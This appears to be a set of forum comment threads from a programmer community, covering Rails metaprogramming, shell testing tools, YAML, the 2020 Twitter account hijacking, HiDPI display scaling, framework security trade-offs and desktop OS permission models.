1. 2

    For $HOME, my new shed/workshop/what-have-you is about to be built… right where the fibre comes into the house, and right where a (currently unused) ethernet conduit traverses the exterior wall.. so I guess I’ll be moving them slightly, so as to avoid damage/issues.

    For $WORK I need to do some research on a piece of software a potential client is already using, to estimate some work that integrates with it.

    1. 7

      Having worked on a lot of Rails codebases and teams, big and small, I think this article is pretty spot on. Once your codebase or team is big enough that you find yourself getting surprised by things like

      counters = %i(one two three four five)
      counters.each do |counter|
        define_method("do_#{counter}_things") do |*args|
          # whatever horrible things happen here

      etc… you’ve outgrown rails.

      1. 7

        This is my litmus test for “has this person had to maintain code they wrote years ago”.

        I don’t think I’ve yet worked with anyone who can answer yes but also wants me to maintain code that can’t be found via grep.

        1. 3

          What unholy beast is that. I mean. Seriously. Wtf is that?

          1. 4

            It’s gruesome, and I’ve seen a version of it (using define_method in a loop interpolating symbols into strings for completely ungreppable results) in at least 3 different large old codebases, where “large” is “50KLOC+” and “old” is “5+ years production”

            There are a lot of ways to write unmaintainable code in a lot of languages/frameworks, but if I ever were to take a Rails job again, I would specifically ask to grep the codebase for define_method and look for this prior to taking the job. It’s such a smell.

            1. 2

              I don’t understand why it’s so normalized in rails to define methods in the fly. You could do that monstrosity easily in most interpreted languages, but there’s a reason people don’t! On Rails, it’s just normal.

              1. 4

                It’s been a long time since I’ve read the ActiveRecord source so it may no longer be this way, but there was a lot of this style of metaprogramming in the early versions (Rails 1.x and 2.x) of the Rails source, ActiveRecord in particular, and I think it influenced a lot of the early adopters and sort of became idiomatic.

          2. 1

            Who the fuck writes code like this?


            1. 1

              The time between “just discovered ruby lets you do that” and “just realized why I shouldn’t” varies from person to person; I’ve seen it last anywhere between a week and a year.

          1. 1

            This is a bit simplistic for my tastes, but thumbs up for another tool that helps people write maintainable shell.

            In case anyone wonders: I use shunit2 for testing stuff I write in shell.

            1. 1

              I am perplexed as to the point of this. What is the value in it? Why would I want to use it? The post explains none of these things.

              1. 0

                The point is to run tests on shell scripts, so that as code changes over time, the output/result of that code is what’s expected/required.

                The whole concept of unit testing is explained on Wikipedia if you wish to know more: https://en.wikipedia.org/wiki/Unit_testing

                1. 1

                  Then I consider this is a very poor attempt at a unit testing library.

                  1. 1

                    Why do you say that?

              1. 2

                I’ve used “built in” security like you describe a couple of times, for web apps that used an LDAP DIT as primary “database”. While it can be a steep learning curve for devs not used to working with LDAP in general (particularly if the ACLs get complex), I really like this setup.

                I’ve found that for all the hooplah the last few years about “no sql” databases, OpenLDAP has most if not all those bases covered - especially for the non-extreme use cases most people need - but with solid, well understood built in support for schemas, indexes, replication, auditing, etc.

                1. 1

                  Upcoming for LDAP. It’s quite a beast to tame, but it does the job immensely well.

                1. 2

                  I’ve been pretty happy with https://github.com/kward/shunit2/, which is explicitly not bash-specific

                  1. 12

                    To say “YAML has its oddities” is like saying “the ocean is somewhat damp”.

                    I can only assume that every adoption of YAML has been by people who heard about it being used, but had never actually used it in any depth themselves. To believe otherwise, is to believe that those people willingly opted-in to the ridiculous semantics, syntax and parsers that surround YAML.

                    1. 3

                      Agreed. I’d rather use XML than YAML.

                      1. 3

                        I’m not sure.

                        I certainly miss the ability to check whether a document is both syntactically valid and semantically conformant to a schema.

                        But OTOH yaml is so quick and easy to write and read… I think it’s good that it’s being used in stuff like ansible/kubernetes.

                        1. 5

                          But OTOH yaml is so quick and easy to write and read… I think it’s good that it’s being used in stuff like ansible/kubernetes.

                          I don’t think this is true – how can something be “quick and easy to write and read” when even the YAML parsers themselves are disagree with each other on what’s valid YAML?

                          I think it’s good that it’s being used in stuff like ansible/kubernetes.

                          It certainly fits the quality standards of Go software. :-)

                          1. 4

                            I don’t think this is true – how can something be “quick and easy to write and read” when even the YAML parsers themselves are disagree with each other on what’s valid YAML?

                            Because the problematic bits are <1% of the spec and everyone mostly uses the other 99%.

                            1. 2

                              Just imagine how people would absolutely lose their mind if the same was true about XML.

                              1. 2

                                I’m not saying that 1% isn’t a problem. But I think the syntax conveniences of YAML over XML explain its popularity despite the spec issue.

                            2. -1

                              Regarding go software and kubernetes in particular… Can you name a comparably feature rich and production ready open source alternative?

                              I agree that kubernetes introduces its own complexity and everything… Yet it’s probably one of the best alternatives we have right now.

                              1. 3

                                I think the alternative is not using Kubernetes (and perhaps seriously reflecting on all the wrong life choices made that resulted in thinking one needs Kubernetes in the first place).

                                1. -2

                                  In other words: you can’t. Case closed.

                            3. 1

                              The use of significant white space instantly discounts any “easy to write” claim as bullshit.

                        1. 24

                          That headline is pretty confusing. It seems more likely twitter itself was compromised, than tons of individual users (billionaires, ex-leaders, etc)?

                          1. 18

                            You’re right. This is a case of Verge reporting what they’re seeing, but the scope has grown greatly since the initial posts. There have since been similar posts to several dozen prominent accounts, and Gemini replied that it has 2FA.

                            Given the scope, this likely isn’t accounts being hacked. I suspect that either the platform or an elevated-rights Twitter content admin has been compromised.

                            1. 12

                              Twitter released a new API today (or was about to release it? Not entirely clear to me what the exact timeline is here), my money is on that being related.

                              A ~$110k scam is a comparatively mild result considering the potential for such an attack, assuming there isn’t some 4D chess game going on as some are suggesting on HN (personally, I doubt there is). I don’t think it would be an exaggeration to say that in the hands of the wrong people, this could have the potential to tip election results or even get people killed (e.g. by encouraging the “Boogaloo” people and/or exploiting the unrest relating to racial tensions in the US from some strategic accounts or whatnot).

                              As an aside, I wonder if this will contribute to the “mainstreaming” digital signing to verify the authenticity of what someone said.

                              1. 13

                                or even get people killed

                                If the Donald Trump account had tweeted that an attack on China was imminent there could’ve been nuclear war.

                                Sounds far-fetched, but this very nearly happened with Russia during the cold war when Reagan joked “My fellow Americans, I’m pleased to tell you today that I’ve signed legislation that will outlaw Russia forever. We begin bombing in five minutes.” into a microphone he didn’t realize was live.

                                1. 10

                                  Wikipedia article about the incident: https://en.wikipedia.org/wiki/We_begin_bombing_in_five_minutes

                                  I don’t think things would have escalated to a nuclear war that quickly; there are some tensions between the US and China right now, but they don’t run that high, and a nuclear war is very much not in China’s (or anyone’s) interest. I wouldn’t care to run an experiment on this though 😬

                                  Even in the Reagan incident things didn’t seem to have escalated quite that badly (at least, in my reading of that Wikipedia article).

                                  1. 3

                                    Haha. Great tidbit of history here. Reminded me of this 80’s gem.

                                    1. 2

                                      You’re right - it would probably have gone nowhere.

                                  2. 6

                                    I wonder if this will contribute to the “mainstreaming” digital signing to verify the authenticity of what someone said

                                    It’d be nice to think so.

                                    It would be somewhat humorous if an attack on the internet’s drive-by insult site led to such a thing, rather than the last two decades of phishing attacks targeting financial institutions and the like.

                                    1. 3

                                      I wonder if this will contribute to the “mainstreaming” digital signing to verify the authenticity of what someone said.

                                      A built-in system in the browser could create a 2FA system while being transparent to the users.

                                      1. 5

                                        2fa wouldn’t help here - the tweets were posted via user impersonation functionality, not direct account attacks.

                                        1. 0

                                          If you get access to twitter, or the twitter account, you still won’t have access to the person’s private key, so your tweet is not signed.

                                          1. 9

                                            Right, which is the basic concept of signed messages… and unrelated to 2 Factor Authentication.

                                            1. 2

                                              2FA, as I used it, means authenticating the message, via two factors, the first being access to twitter account, and the second, via cryptographically signing the message.

                                              1. 3

                                                Twitter won’t even implement the editing of published tweets. Assuming they’d add something that implicitely calls their competence in stewarding people’s tweets is a big ask.

                                                1. 2

                                                  I’m not asking.

                                      2. 2

                                        A ~$110k scam

                                        The attacker could just be sending coins to himself. I really doubt that anyone really falls for a scam where someone you don’t know says “give me some cash and I’ll give you double back”.

                                        1. 15

                                          I admire the confidence you have in your fellow human beings but I am somewhat surprised the scam only made so little money.

                                          I mean, there’s talk about Twitter insiders being paid for this so I would not be surprised if the scammers actually lost money on this.

                                          1. 10

                                            Unfortunately people do. I’m pretty sure I must have mentioned this before a few months ago, but a few years ago a scammer managed to convince a notary to transfer almost €900k from his escrow account by impersonating the Dutch prime minister with a @gmail.com address and some outlandish story about secret agents, code-breaking savants, and national security (there’s no good write-up of the entire story in English AFAIK, I’ve been meaning to do one for ages).

                                            Why do you think people still try to send “I am a prince in Nigeria” scam emails? If you check you spam folder you’ll see that’s literally what they’re still sending (also many other backstories, but I got 2 literal Nigerian ones: one from yesterday and one from the day before that). People fall for it, even though the “Nigerian Prince” is almost synonymous with “scam”.

                                            Also, the 30 minute/1 hour time pressure is a good trick to make sure people don’t think too carefully and have to make a snap judgement.

                                            As a side-note, Elon Musk doing this is almost believable. My friend sent me just an image overnight and when I woke up to it this morning I was genuinely thinking if it was true or not. Jeff Bezos? Well….

                                            1. 12

                                              People fall for it, even though the “Nigerian Prince” is almost synonymous with “scam”.

                                              I’ve posted this research before but it’s too good to not post again.

                                              Advance-fee scams are high touch operations. You typically talk with your victims over phone and email to build up trust as your monetary demands escalate. So anyone who realizes it’s a scam before they send money is a financial loss for the scammer. But the initial email is free.

                                              So instead of more logical claims, like “I’m an inside trader who has a small sum of money to launder” you go with a stupidly bold claim that anyone with a tiny bit of common sense, experience, or even the ability to google would reject: foreign prince, huge sums of money, laughable claims. Because you are selecting for the most gullible people with the least amount of work.

                                        2. 5

                                          My understand is that Twitter has a tool to tweet as any user, and that tool was compromised.

                                          Why this tool exists, I have no idea. I can’t think of any circumstance where an employee should have access to such a tool.

                                          Twitter has been very tight-lipped about this incident and that’s not a good look for them. (I could go on for paragraphs about all of the fscked up things they’ve done)

                                          1. 5

                                            or an elevated-rights Twitter content admin

                                            I don’t think content admins should be able to make posts on other people’s account. They should only be able to delete or hide stuff. There’s no reason they should be able to post for others, and the potential for abuse is far too high for no gain.

                                            1. 6

                                              Apparently some privileges allow internal Twitter employees to remove MDA and reset passwords. Not sure how it played out but I assume MFA had to be disabled in some way.

                                            1. 5

                                              That’s a good article! Vice has updated that headline since you posted to report that the listed accounts got hijacked, which is more accurate. Hacking an individual implies that the breach was in their control: phone, email, etc. This is a twitter operations failure which resulted in existing accounts being given to another party.

                                          1. 1

                                            Say what you want about Oracle’s stewardship of MySQL, at least they’re not actively adding mysql-only syntax for new features that are already defined in the SQL standard, and are in fact deprecating/removing non-standard syntax.

                                            1. 1

                                              The last time I had to work on a large shell project, I started out doing something similar to this, but found it a little limited, so I wrote this. This is more focused on projects big enough to have a wiki, and libraries or shell functions. The approach presented in the article works great for small standalone scripts.

                                              1. 2

                                                Yep - I took a pretty similar approach, for pretty similar reasons. The biggest difference is that I targeted markdown rather than RST, and I wrote mine in shell.

                                              1. 13

                                                Managed services == cloud which leads to vendor lockin which leads to centralization of the internet.

                                                Hard pass.

                                                Own your infrastructure, own your data. If you care about your business you’ll do this. If you are cash strapped and can’t find or afford the talent, that’s a whole different cup of otters.

                                                1. 3

                                                  If you use something like managed PostgreSQL then I assume you’ll always have the option to dump your data and import it somewhere else, right?

                                                  1. 3

                                                    Yes, with downtime unless they also offer replication access (RDS do not).

                                                    1. 2

                                                      Context: I contract to (mostly) small companies providing ops/tooling and dev services.

                                                      TLDR: If you don’t want to have to hire in-house ops people to manage your DB layer, I’d very much recommend a company (e.g. Percona or similar) to manage it for you, on infra you control.

                                                      Long rant-y version:

                                                      This is (one of) the key point that surprises clients when I talk to them about a multi-vendor solution.

                                                      They mostly understand fairly well the risk of relying on a single company, especially with how rube-goldbergy AWS is.

                                                      “Ok so we’ll just use <cloud 1> and <cloud 2>, right?”

                                                      I’ve literally never seen any first party managed DB service (i.e. where the management isn’t provided by some third party, e.g. Percona) that will even acknowledge the existence of a managed instance provided by another company. And with the direction that AWS in particular goes, you’d be crazy to try it: replicating to/from their “patched” / “reimplemented” versions and a regular instance elsewhere? Sounds like you’re just begging for incompatibilities there.

                                                      At the very most, I’d vaguely agree (with the overall discussion, WRT databases) that some businesses might benefit from having a third party manage their DB setup, across multiple vendors (i.e. just using the vendors to provide virtual machine instances or some form) that the business itself controls (i.e. you give DBs-R-Us access to your DB infra, not pay them to provide you with a hosted DB service). In this scenario the big “cloud” operators are likely worse options, as they’re very much keyed around using as much of there “as a service” stack as possible, and just renting dumb VMs from them 24x7 is ridiculously expensive compared to the competition.

                                                1. 3

                                                  I’m still at a loss for a good distributed log analyser.

                                                  GoAccess has most of what I/we want, but it’s got no support for e.g. storing the accumulated metrics in e.g. Redis, or SQL, or what have you, and thus it’s not really fantastic for anything with > 1 web server.

                                                  So far I’m still tossing up if I should just write one myself.

                                                  1. 1

                                                    Why not try submitting a patch upstream? I’m sure other GoAccess users have similar needs.

                                                    1. 3

                                                      GoAccess is written in C, which is most definitely not in my wheel house. Ok, so, why not just learn some more?

                                                      The previous time I took the effort to make a patch against a C codebase (not that being C is the specific thing, but being a significant effort required due to my inexperience, compared to either a language I am familiar with, or a person familiar with C) was also, “scratching my own itch” - I submitted the PR 1 year and 19 days ago. So far, the ‘owner’ of the project hasn’t responded to the PR at all.

                                                      Previous PRs haven’t all necessarily been completely ignored like that, but I’ve had more multi-month+ delays in getting any kind of feedback/activity, than I have “positive” engagements.

                                                      I guess what I’m saying is: the effort involved for me is going to be quite high, and having to maintain a fork of a tool written in C (if there’s zero upstream action/interest) isn’t really on my “hey this sounds like it’d be fun” list.

                                                      Edit: and I should add - I’m not “negative” on Open Source. The stuff I write for my company is specifically all OSS, and I have obviously had some reasonably good experiences with upstream projects. But the often bandied “if projects aren’t on GitHub they wont get contributors because it’s harder to find/no network effect” line, to me misses a significant aspect. This isn’t PR field of dreams, where “if you PR, they will merge it”. Just because someone submits a PR doesn’t mean there’s any specific likelihood it’ll ever be looked at.

                                                      1. 1

                                                        I’ve had similar experiences. One of my own PRs took a year and a half to get accepted, and I was just updating documentation!

                                                        I didn’t mean to suggest that you should rush into writing code. Open an issue outlining the problem first to gauge interest. Make sure you note your willingness to contribute code, but don’t write a line until one of the maintainers makes it clear that they’re on board. Of course, if you really don’t want to take the time, then don’t! It’s your life; live it the way you want to!

                                                  1. 1

                                                    I guess it’s fitting that an editor written in a web browser can then show stuff from the web. Not really sure either of those is a good thing though.

                                                    1. 4

                                                      4k monitor only makes sense with 2× / 200% scaling

                                                      Yep. Can’t stress enough how non-integer scaling is a bad idea.

                                                      1. 2

                                                        This is subjective. I use a 27” 4K display at 1.5 and it’s fine. I can’t see pixels from the distance I’m standing away so it looks sharp to me.

                                                        1. 1

                                                          Similarly, I can’t stress enough, how much assuming everyone else’s priorities are the same as yours, is a bad idea.

                                                        1. 5

                                                          I agree that a Hi-DPI display is a good investment, even “just for text”. I spend 80% of my (working) time in either an IDE, a Terminal or an SQL client. Even when I’m using a browser it’s mostly to read (or write) text.

                                                          But I have to disagree with the “integer scaling” point re: macOS, particularly given that the article is about “upgrade your monitor”, which implies buying something. If you take a screenshot of a UI element or some rendered text and scale them up, yes, you will see that picking non-integer scaled UI in macOS will give you non “crisp” lines. That you can’t show an example at the scale they actually appear (the way he does with the font-smoothing on/off screenshot) is telling. It also ignores the reality of the market.

                                                          Most traditional “low DPI” displays are around 100 to 110 DPI. All of Apple’s “Retina” displays are right around 220DPI. For a 15 or 16” MBP with a DPI of 220, picking the exact “@2x” resolution (i.e. half the vertical and horizon res of the physical panel) is (a) not much of a change from the default, and will look very readable (and reduce a little GPU strain as well).

                                                          But let’s be honest, very few people are working on just a laptop screen by choice. If you write software there’s a better than average chance you are, or could be, more productive with more screen real estate. If you want to dispute this, then you may as well just stop reading and start abusing me for making assumptions because the rest isn’t gonna make you any less angry.

                                                          Ok, so you want an external display, and you want to use Hi-DPI mode so the fonts are all crisp and nice to look at. Great. If your vision is decent, and you want to follow the author’s “recommendation” about scaling, I’d argue that you have realistically just two choices for displays: the 27” 5K LG UltraFine, or the 32” 6K Apple Pro Display. There’s also some weird brand that has the same size/res as the 5K LG, but my understanding is that most people who buy one end up going through several returns until they just have to settle for the least bad unit.

                                                          But wait, you say. There are are dozens and dozens of 4K displays on the market! Heaps of people have 4K 27” displays, and macOS detects it as Hi-DPI. Yes, it does. But this is where that integer scaling thing comes in. If you run a 4K display at it’s “integer scaled @2x” resolution, it presents an image that “looks like” 1920x1080.

                                                          Have you seen 1920x1080 on a 27” display? I haven’t. I’ve seen it on 24” displays, where it’s just about liveable if you’re really obsessed with integer scaling. On a 27” I’d imagine it looks like you’re reading a “my first numbers” book for toddlers.

                                                          Sitting at arms length (literally, if I reach out I can not quite touch the displays in front of me), I use 2, 24” 4K displays. And I use them at the dastardly “non integer” scaled UI of “Looks like 2304x1296”. If I put one back to integer scaling so it’s “looks like 1920x1080”, I can of course see a difference. But probably not the difference the author is suggesting. The difference I see, is that on the one using integer scaling, everything looks weirdly over-sized. I would need to either press my face to the screen or screenshot and scale it up a heap to see any small imperfect pixel placements.

                                                          IMO this is the biggest benefit of a high-enough DPI. You aren’t fixed to a single resolution matched to the hardware, and beyond that things look like absolute shit (ever tried running a ~110 DPI display at a non-native resolution - e.g for someone with poorer eyesight? “I dont care if its blocky at least I can read it” was the common response to our (support team’s) shock at this phenomenon, circa 2004).

                                                          Obviously the larger the display goes without increasing resolution, the lower your DPI so the more obvious the negative effects of both modes: As the physical size increases, In “integer scaling mode” you go from “my first numbers” text, to standing on the writing on a football field and trying to read the text you’re standing on. In non-integer scaling mode, the “blurriness” of the rendered pixels will increase. I can’t comment on how visually noticeable this is, because while I accept non-integer scaling as my lord and saviour, I still aimed for the highest DPI (aka lowest physical size compared to resolution) I could find.

                                                          1. 1

                                                            That you can’t show an example at the scale they actually appear (the way he does with the font-smoothing on/off screenshot) is telling.

                                                            Let’s imagine that the reader browses the page on a Mac with non-integer scaling. What’s the screenshot going to look like?

                                                            1. 2

                                                              My point is that felt the need to scale the image to 800% (yes really) to show a difference.

                                                              If you’re on a Mac, open up his image in Preview, and compare it to the Finder toolbar. You need to scale his down to 12.5% to get it to appear the same as the actual toolbar controls. Now look at the content of his image. Apart from one being slightly smaller (due to his process to “simulate” a non-integer screenshot no doubt), There is no way you can tell me you would notice the difference between the two.

                                                              Unless you’re designing UI’s where you need to see literally one exact pixel, the argument that no one should ever use integer scaling is just blind (no pun intended) to (a) how eyes work, (b) why people use high dpi displays and (c) the market of available products.

                                                          1. 10

                                                            Every Ruby on Rails app was found vulnerable in 2013, and the Equifax data breach was due to an outdated version of Apache Struts. Not trying to hate on these frameworks specifically here – I like Rails – but they’re high-profile examples that show that frameworks are not always sunshine either.

                                                            Lobsters for example is written in Rails, but it uses a small fraction of Rails’ features. I don’t think it would really be any less secure if it had been written “from scratch” by someone who knew what they were doing, especially not if they used existing libraries like Rack and whatnot. (there are of course many other advantages to using Rails, and I think Rails is a pretty good fit for something like Lobsters. but not because it’s more secure).

                                                            Years ago (my first programming job) there was some push to replace a very simple CRUD CMS with Joomla. I pushed back against this as the code was pretty simple (not much that could go wrong) and I also knew that after I left no-one else would be there to maintain or update it, increasing the risk of automated scanners trying to find vulnerable Joomla versions etc. I think this is a good example where using a framework would not be a good idea.

                                                            So … it all depends on what you’re doing. I think The Real Lesson™ here should be to throw as much funky input towards your code as possible, especially security-critital code. I think a fuzzer would probably have caught this error.

                                                            I don’t know what kind of websites those “200 websites” are, if they’re simple “deploy and forget” stuff then a simple custom framework with very little moving parts might be a good idea. If they’re complex sites then a standard framework would probably be better (even in “deploy and forget” scenarios). Either way, like most “which should I use” questions the answer is “it depends” :-)

                                                            1. 4

                                                              Not trying to hate on these frameworks specifically here – I like Rails – but they’re high-profile examples that show that frameworks are not always sunshine either.

                                                              I believe the killer argument is “not my fault”. When you use something backed by a big community, you won’t be held accountable for its bugs, even if they cost significant money. If you wrote that bug however, that’s another matter. Especially if you had the option of using that popular thingy instead.

                                                              1. 2

                                                                Often, “not my fault” turns into “not a simple fix” though

                                                                1. 5

                                                                  Definitely. That’s one reason why I personally like to minimise dependencies: code I wrote is code I can fix.

                                                                  1. 3

                                                                    This is a sadly uncommon view in 2020, I feel.

                                                            1. 3

                                                              TLDR: Using a framework means giving up a lot of control, which becomes particularly problematic when you are dealing with a discovered bug.

                                                              Long, rant-y version:

                                                              … The counterpoint to this whole framework “herd immunity” concept is twofold:

                                                              (a) Once the herd is big enough, you’re guaranteed to be a target for automated attacks. Anyone who’s ever looked at a web server log has seen hundreds if not thousands of 404’s for calls to non-existent end points that do exist under (typically php) ‘frameworks’ like WordPress or the like. As has been mentioned by others - someone discovered a serious bug in Rails several years back, and just like that every rails app in the world was vulnerable to an easily exploitable bug. Security through obscurity isn’t great security - but there is a reason “hide your valuables” is still sound advice in a car park.

                                                              (b) If you control (or arguably, understand well enough to be comfortable patching) the library/framework, you can fix a bug as soon as you know it exists. Just because a community exists doesn’t mean that a fix is going to be timely or adopted instantly, particularly if you’re at multiple levels of dependency.

                                                              To illustrate point (b), last year I came across a weird bug where some actions in a third-party Ruby web app weren’t working. After a lot of faffing about, it turned out to be a bug introduced in a patch version (2.0.5) of Sinatra, that just broke shit on versions of Ruby before 2.4.

                                                              I don’t pretend to be a Ruby expert, I can mostly read it, I tend to not write it, but even I’d heard of Sinatra framework before this bug, so let’s just say that it’s reasonably popular in the Ruby world. The timeline around the bug that I encountered was thus:

                                                              2018-12-23 Sinatra 2.0.5 is released 2019-01-11 Issue describing SNAFU status on Ruby < 2.4 is filed. 2019-02-07 Issue is closed via PR …. Crickets 2019-08-21 Sinatra 2.0.6 is released with the fix

                                                              I’m just going to ignore that the fix was to literally add 5 characters + two spaces (literally val && ), and that the time from issue opened to PR opened was roughly the same as the amount of time then spent discussing the PR and whether or not the PR author was correct for having following their own contributing guide and updating the changing file. All of that is IMO ridiculous, but inconsequential in the grand scheme of things.

                                                              If you release a patch version that fucks shit up, and your “release schedule” is every 6 months, you either need to make sure your shit is fucking solid, or throw your fucking release schedule out the fucking window.

                                                              The current fad with “re-use all the things, don’t ever write anything that anyone might have written before” is beyond stupid. Given the sort of shit we’ve seen from this practice in the NodeJS community, I would fully expect these people to insist that they don’t need a lawyer to write a contract for a business, they have this perfectly good one their niece wrote in fucking crayon. It says “contract” on the top (although the R is reversed of course) so it must be of equal quality.

                                                              1. 1

                                                                If you release a patch version that fucks shit up, and your “release schedule” is every 6 months, you either need to make sure your shit is fucking solid, or throw your fucking release schedule out the fucking window.

                                                                It might be a good idea to bank a portion of the money saved on license and support fees to be able to pay an experienced Ruby consultant to fix stuff if needed.

                                                                1. 1

                                                                  … Unless the “ruby consultants” you know have some magical ability to force third party projects to make more frequent releases when bug fixes are merged, what exactly are you suggesting that they could do?

                                                                  We knew the problem. Short term we used a patch on the ruby file in question, and longer term we switched to installing a newer version of ruby from a third party apt repo.

                                                                  1. 1

                                                                    Thanks for clarifying, it seemed at first read that you didn’t get this resolved until Sinatra was updated.

                                                                    Open source saves the day again!

                                                              1. 8

                                                                I recently moved from cold north-europe to Thailand and while I was big dark theme advocate and used it everywhere I did a complete 180° here. It’s just so bright here and it’s so nice to work in brighter environments. I’m even waking up early at 6am to enjoy working outside in the balcony. Even so early in the morning and with modern screens it’s still very hard to clearly see and read with a dark theme. Clearly a light theme is the way to go here in Thailand.

                                                                What I’m getting to with my anecdote is that this seems be an issue of environments. I think all of the pros/cons can flip right over when the screen is moved somewhere else. Even with my love of light solarized theme I’d probably switch right back to dark theme if I’d have to move back to cold, north-european winter.

                                                                1. 4

                                                                  Clearly a light theme is the way to go here in Thailand.

                                                                  Conversely, due to the heat (edit:) and humidity it’s entirely possible someone in Thailand will work inside with less natural light.

                                                                  Geographic location likely has very little impact on whether a light or dark background produces less eye strain. The work area level environment has a lot of impact on it. You could be working in a cloudy city and I’d imagine that working from a balcony would still be too bright for dark mode to be “better”.

                                                                  1. 3

                                                                    What I’m getting to with my anecdote is that this seems be an issue of environments.

                                                                    This seems to be my experience as well. In winter months, I’m perfectly happy with dark themes but in the summer, especially in the morning, or when I’m working from coffee shops I just need the light mode. One other thing that seems to be a factor here is what I’m working on: for example if I have dark theme in the editor and the terminal, but no way of changing it in other windows that I also need to use (like in the browser or PDF reader) then it’s awkward to switch from dark to light and I just prefer to use light mode everywhere.

                                                                  1. 57

                                                                    Honestly, for the vast majority of users, the security domain model of modern *nix desktops is incorrect.

                                                                    The vast majority of machines only ever have one user on them. If something running as that user is compromised, that’s it. Even if there were no privilege escalation, so what? You can’t install device drivers…but you can get the user’s email, overwrite their .profile file, grab their password manager’s data, etc, etc.

                                                                    I think that if I were designing a desktop operating system today, I would do something along the lines of VM/CMS…a simple single-user operating system running under virtualization. The hypervisor handles segregating multiple users (if any), and the “simple” operating system handles everything else.

                                                                    (I know Qubes does something like this, but its mechanism is different from what I’m describing here.)

                                                                    In that hypothetical simple single-user operating system, every application runs with something akin to OpenBSD’s pledge baked in. Your web browser can only write to files in the Downloads directory, your text editor can’t talk to the network, etc.

                                                                    The *nix permissions model was designed to deal with a single shared machine with a lot of users and everything-is-a-file. The modern use case is a single machine with a single user and the need for semantic permissions rather than file-level permissions.

                                                                    1. 16

                                                                      This is very insightful, and definitely has changed the way that I’m thinking about security for my OS design.

                                                                      Here’s the thought that I got while reading your comment: “The original UNIX security model was one machine, many users, with the main threat being from other users on the machine. The modern security model is (or should be) one machine, one user, but multiple applications, with the main threat being from other/malicious applications being run by that single user.”

                                                                      1. 9

                                                                        To make one small tweak to your statement, I would propose the modern model be “many machines, one user, with multiple applications…”. The idea being with those applications you will be dealing with shared risk across all of the accounts you are syncing and sharing between devices. You might only be controlling the security model on one of those machines, but the overall security risk is likely not on the one you have control over and that may make a difference. Do you let applications sync data between every device? Does that data get marked differently somehow?

                                                                        1. 3

                                                                          If you are planning some standard library/API please also consider testability. For example: Global filesystem with “static (in OOP sense)” API make it harder to mock/test than necessary. I think the always available API surface should be minimized, to provide APIs which can be tested, secured, versioned more easily, providing more explicit interactions and failure modes than the APIs we are used to.

                                                                        2. 10

                                                                          This the reason why plan9 removed completely the concept of “root” user. It has a local account used to configure the server, yet cannot access its resources, and then users will connect to it and get granted the permissions from a dedicated server (could be running on the same machine). It is much cleaner when considering a machine that is part of a larger network, because the users are correctly segragated and simply cannot escalate their privilege, they need access to the permission server to do that.

                                                                          1. 14

                                                                            I agree, and would like to extend it with my opinion:

                                                                            Global shared filesystem is an antipattern (it is a cause of security, maintenance, programming problems/corner cases). Each program should have private storage capability, and sharing data between application should be well regulated either by (easily) pre-configured data pipelines, or with interactive user consent.

                                                                            Global system services are also antipatterns. APIs suggesting services are always available by default, and unavailability is an edge case is an antipattern.

                                                                            Actually modern mobile phone operating systems are gradually shifting away from these antiqued assumptions, and are having the potential to be much more secure than existing desktop OSs. These won’t reach the mainstream UNIX worshipping world. On desktop Windows is moving in this direction, eg. desktop apps packaged and distributed via Microsoft Store each run in separate sandboxes (had quite a hard time finding HexChat logs), but Microsoft’s ambition to please Mac users (who think they are Linux hackers) is slowing the adaptation (looking at you winget, and totally mismanaged Microsoft Store with barely working search and non-scriptabilty).

                                                                            1. 10

                                                                              Global shared filesystem is an antipattern (it is a cause of security, maintenance, programming problems/corner cases).

                                                                              If your only goal is security, this is true. If your goal is using the computer, then getting data from one program to another is critical.

                                                                              Actually modern mobile phone operating systems are gradually shifting away from these antiqued assumptions, and are having the potential to be much more secure than existing desktop OSs.

                                                                              And this (along with the small screens and crappy input devices) is a big part of why I don’t do much productive with my phone (and the stuff I do use for it tends to be able to access my data, eg – my email client).

                                                                              1. 4

                                                                                Actually I have seen many (mostly older) people for whom the global filesystem is a usability problem. It is littered by uninteresting stuff for them, they just want to see their pictures, when pressing the “attach picture” button on a website, not the programs, the musics, not /boot or C:\Windows, etc…

                                                                                Also it creates unnecessary programming corner cases: if your program wants to create a file with name foo, another process may create a directory with the same name to the same location. There are conventions to lower this risk, still it is an unnecessary corner case.

                                                                                Getting data from one place to another can be solved a number of ways without global filesystem. For example you can create a storage location and share it to multiple applications, though this still creates the corner cases I mentioned above. Android does provide a globally shared storage for this task, which is not secure, its access needs explicit privilege at least. Also you can specifically share data from one app to another without the need for any filesystem, as in Android’s Activities or Intents.

                                                                                I think there are proven prototypes for these approaches, though I think the everything is a file approach is also a dead-end in itself, which also limits the need for a “filesystem”.

                                                                                Note: the best bolted-on security fix to traditional UNIX filesystem me seems to be the OpenBSD pledge approach, too bad OpenBSD has other challenges which limit its adoption. I also like the sandbox based approached, but then I’d rather go steps further.

                                                                                1. 2

                                                                                  Getting data from one place to another can be solved a number of ways without global filesystem. […] Android does provide a globally shared storage for this task, which is not secure, its access needs explicit privilege at least.

                                                                                  That is a great example of how hard it is to find the right balance between being secure and not nagging the user.

                                                                                  In order not to bother the users too much or too often, Android will ask a simple question: do you want this app to access none of your shared files (but I want this funny photo-retouch app to read and modify the three pictures I took ten minutes ago) or do you allow it to read all your shared files (and now the app can secretly upload all your photos to a blackmail/extortion gang). None of these two options are really good.

                                                                                  The alternative would be fine-grained access, but then the users would complain about having too many permission request dialogs.

                                                                                  In the words of an old Apple anti-Windows ad: «You are coming to a sad realization: cancel or allow?»

                                                                                  1. 5

                                                                                    Meanwhile in ios you can use the system image picker (analogous to setuid) to grant access to select files without needing any permission dialogs.

                                                                                    1. 1

                                                                                      This is a valid option on Android as well

                                                                              2. 6

                                                                                I disagree. Having files siloed into application specific locations would destroy my workflow. I’m working on a project that includes text documents, images and speadsheets. As an organization method, all these files live under a central directory for the project as a whole. My word processor can embed images. The spreadsheet can embed text files. This would be a nightmare under a siloed system.

                                                                                A computer should adapt to how I work, not the other way around.

                                                                                1. 7

                                                                                  In a properly designed silo’d filesystem, this would still be perfectly possible. You’d just have to grant each of those applications access to the shared folder. Parent is not suggesting that files can’t be shared between applications:

                                                                                  sharing data between application should be well regulated either by (easily) pre-configured data pipelines, or with interactive user consent.

                                                                                  1. 1

                                                                                    Even you could create security profiles, based on projects, with the same applications having different set of shared access patterns based on security profile.

                                                                                    It could be paired with virtual desktops, for example, to have a usable UX for this feature. I’d be happy in my daily work when shuffling projects, to have only the project-relevant stuff in my view at a time.

                                                                                2. 3

                                                                                  Global shared filesystem is an antipattern

